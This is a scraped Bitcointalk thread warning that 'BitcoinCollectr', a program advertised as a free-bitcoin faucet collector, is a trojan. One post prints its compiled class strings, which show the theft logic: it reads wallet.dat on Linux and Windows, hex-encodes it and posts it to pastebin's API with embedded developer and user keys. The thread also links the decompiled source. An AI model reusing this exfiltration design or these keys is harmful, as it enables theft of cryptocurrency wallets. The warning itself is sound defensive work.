trojan warning "BITCOINCOLLECTR" | Bitcointalksearch.org

hamdi

hero member

Activity: 826

Merit: 500

the virus is pretty cool though

rjk

sr. member

Activity: 448

Merit: 250

1ngldh

Quote from: dizzy1 on May 30, 2012, 09:14:43 PM

This is a trojan. It reads the wallet.dat from the file level and pastes it to pastebin.com so if your wallet is encrypted you should be fine. Linked below is the decomplied source code.

http://freeter.me:81/BitcoinCollectr0.8beta.src.zip

Maybe if you send the pastebin-related source snippet to pastebin, maybe they can help identify the user based on the included dev and user API keys?

dizzy1

full member

Activity: 134

Merit: 100

This is a trojan. It reads the wallet.dat from the file level and pastes it to pastebin.com so if your wallet is encrypted you should be fine. Linked below is the decomplied source code.

http://freeter.me:81/BitcoinCollectr0.8beta.src.zip

drakahn

hero member

Activity: 504

Merit: 500

Quote from: vuce on May 25, 2012, 02:21:13 AM

Quote from: drakahn on May 25, 2012, 02:18:10 AM

is there a way to monitor wallet.dat and stop any program from accessing it without some sort of user interaction?

acl

i think i need to find a mirror to facepalm myself

vuce

sr. member

Activity: 476

Merit: 250

Quote from: drakahn on May 25, 2012, 02:18:10 AM

is there a way to monitor wallet.dat and stop any program from accessing it without some sort of user interaction?

acl

drakahn

hero member

Activity: 504

Merit: 500

there is another one too that people have fallen for "neheminer" or something, claims to be the fastest mining program but steals your wallet (and possibly changes btc addresses sent to clipboard, that may be a different trojan altogether though)

is there a way to monitor wallet.dat and stop any program from accessing it without some sort of user interaction?

vuce

sr. member

Activity: 476

Merit: 250

Even if true I don't see this as such a problem anymore, pretty much everyone should have his wallet encrypted at this time...

giszmo

legendary

Activity: 1862

Merit: 1105

WalletScrutiny.com

not too eager to investigate the claims but if it's true, why is this thread so quiet?

rjk

sr. member

Activity: 448

Merit: 250

1ngldh

Please break your links so that they do not get indexed and flagged.

hamdi

hero member

Activity: 826

Merit: 500

WARNING! this tool tries to steal your wallet.dat!!!

this guy ( https://bitcointalksearch.org/user/meneken-57949 ) tries to lure people into using this tool via his signature right now!!

http://btccollectr.bt.ohost.de/

Quote

BitcoinCollectr

beta

What is it?

BitcoinCollectr is a little project i'm working on at the moment. It makes use of websites that offer free bitcoins and automatically collects them for you.

Where can I get it?

Download here. Consider that it's still beta and probably buggy. Please report bugs to me.

Contact

[email protected]

Donation

I know, it's not worth donating for, but if you insist: 1EZWAuXu3vfHTtBcLuEsht7q1d8Ab7dDPX

Code:

CA\FE\BA\BE\00\00\002v\00\00Main\00\00java/lang/Object\00\00()V\00Code
\00\00 \00\00\00LineNumberTable\00LocalVariableTable\00this\00LMain;\00main\00([Ljava/lang/String;)V\00\00FreeBitcoinService
\00\00 \00\00Bitcoin Faucet \00\00\00\00\00name\00Ljava/lang/String;\00\00http://freebitcoins.appspot.com \00\00\00\00\00url?tz\E1G\AE{ \00\00!\00"\00#\00 btcAmount\00D\00%\00Daily Bitcoins\00'\00http://Daily Bitcoins?@bM\D2\F1\A9\FC\00+\00CoinAd\00-\00https://coinad.com/?h\93t\BCj~\FA\001\00Bitcoin Dispenser\003\00http://dispenser.bitbank.me/?PbM\D2\F1\A9\FC\007\00BitCrate\009\00http://http://www.bitcrate.net/?\94z\E1G\AE{\00=\00mycryptcoin.com\00?\00http://mycryptcoin.com/?`bM\D2\F1\A9\FC\00C\00BitcoinBetas\00E\00http://www.bitcoinbetas.com?\A9\99\99\99\99\99\9A\00I\00java/util/ArrayList
\00H\00 \00L\00N\00M\00java/util/List\00O\00P\00add\00(Ljava/lang/Object;)Z?\ECz\E1G\AE{\00L\00T\00U\00V\00iterator\00()Ljava/util/Iterator;\00X\00Z\00Y\00java/util/Iterator\00[\00\\00next\00()Ljava/lang/Object;?\F3333333\00X\00`\00a\00b\00hasNext\00()Z\00d\00>..............................................................
\00\00f\00g\00h\00o\00(Ljava/lang/String;)V\00j\00>: BitcoinCollectr 0.8 beta 5/13/12 :\00l\00>: :\00n\00>: Author: Yus0r ([email protected]) :\00p\00\00\00r\00: Looking for updates..\00t\00http://btccollectr.bt.ohost.de
\00v\00x\00w\00Util\00y\00z\00getHTML\00&(Ljava/lang/String;)Ljava/lang/String;
\00\00|\00}\00~\00getWalletFileName\00()Ljava/lang/String;\00\80\00java/io/File
\00\00\82\00\00h
\00\00\84\00\85\00\86\00getBytesFromFile\00(Ljava/io/File;)[B
\00v\00\88\00\89\00\8A\00asHex\00([B)Ljava/lang/String;
\00\00\8C\00\8D\00h\00sendPost\00\8F\00: no updates available.\00\91\00java/lang/StringBuilder\00\93\00
: Supporting
\00\90\00\82\00L\00\96\00\97\00\98\00size\00()I
\00\90\00\9A\00\9B\00\9C\00append\00(I)Ljava/lang/StringBuilder;\00\9E\00! free bitcoin collector websites.
\00\90\00\A0\00\9B\00\A1\00-(Ljava/lang/String;)Ljava/lang/StringBuilder;
\00\90\00\A3\00\A4\00~\00toString\00\A6\00: Max. possible profit @\00\00\00\00\00\00\00
\00\90\00\AA\00\9B\00\AB\00(D)Ljava/lang/StringBuilder;\00\AD\00 BTC.\00\AF\00*: Enter receiving address and press ENTER:\00\B1\00java/io/BufferedReader\00\B3\00java/io/InputStreamReader \00\B5\00\B7\00\B6\00java/lang/System\00\B8\00\B9\00in\00Ljava/io/InputStream;
\00\B2\00\BB\00\00\BC\00(Ljava/io/InputStream;)V
\00\B0\00\BE\00\00\BF\00(Ljava/io/Reader;)V
\00\B0\00\C1\00\C2\00~\00readLine\00\C4\00: Starting..\00\C6\00: Processing <\00\C8\00>....\00\CA\00java/net/ConnectException
\00\C9\00\82
\00\CD\00\CF\00\CE\00java/lang/Exception\00\D0\00\00printStackTrace
\00\D2\00\CF\00\D3\00java/io/IOException\00args\00[Ljava/lang/String;\00f1\00LFreeBitcoinService;\00f2\00f3\00f4\00f5\00f6\00f7\00services\00Ljava/util/List;\00max\00s\00filename\00bytes\00[B\00hex\00Ljava/io/BufferedReader;\00address\00e\00Ljava/lang/Exception;\00e1\00Ljava/io/IOException;\00LocalVariableTypeTable\00&Ljava/util/List;\00
StackMapTable\00\D5\00\F1\00java/lang/String\00
Exceptions\00\F4\00java/net/UnknownHostException\00\F6\00api_dev_key\00\F8\00UTF-8
\00\FA\00\FC\00\FB\00java/net/URLEncoder\00\FD\00\FE\00encode\008(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
\00\F0\00\00valueOf\00&(Ljava/lang/Object;)Ljava/lang/String;\00=\00 562298eb26ccc3719f7fa178f8b7fef4\00&
\00
api_option\00paste\00api_user_key\00api_paste_code\00"baedd069b2f6e0948a80c7a8f3daf052: \00java/net/URL\00$http://pastebin.com/api/api_post.php
\00\82
\00openConnection\00()Ljava/net/URLConnection;
\00java/net/URLConnection !\00setDoOutput\00(Z)V#\00java/io/OutputStreamWriter
%&'\00getOutputStream\00()Ljava/io/OutputStream;
")\00*\00(Ljava/io/OutputStream;)V
",-\00h\00write
"/0\00\00flush
234\00getInputStream\00()Ljava/io/InputStream;
"67\00\00close
\00\B06\00content\00data\00Ljava/net/URL;\00conn\00Ljava/net/URLConnection;\00wr\00Ljava/io/OutputStreamWriter;\00rd\00lineC\00os.name
\00\B5EF\00z\00getPropertyH\00Linux
\00\F0JKL\00contains\00(Ljava/lang/CharSequence;)ZN\00 user.homeP\00/.bitcoin/wallet.datR\00APPDATA
\00\B5TU\00z\00getenvW\00\Bitcoin\wallet.dat\00osnameZ\00java/io/FileInputStream
Y\\00]\00(Ljava/io/File;)V
\00_`a\00length\00()J
Ycde\00read\00([B)I
Y6\00file\00Ljava/io/File;\00fileInputStream\00Ljava/io/FileInputStream; \00\B5lmn\00out\00Ljava/io/PrintStream;
prq\00java/io/PrintStreams\00h\00println\00
SourceFile\00 Main.java

Topic: trojan warning "BITCOINCOLLECTR" (Read 2078 times)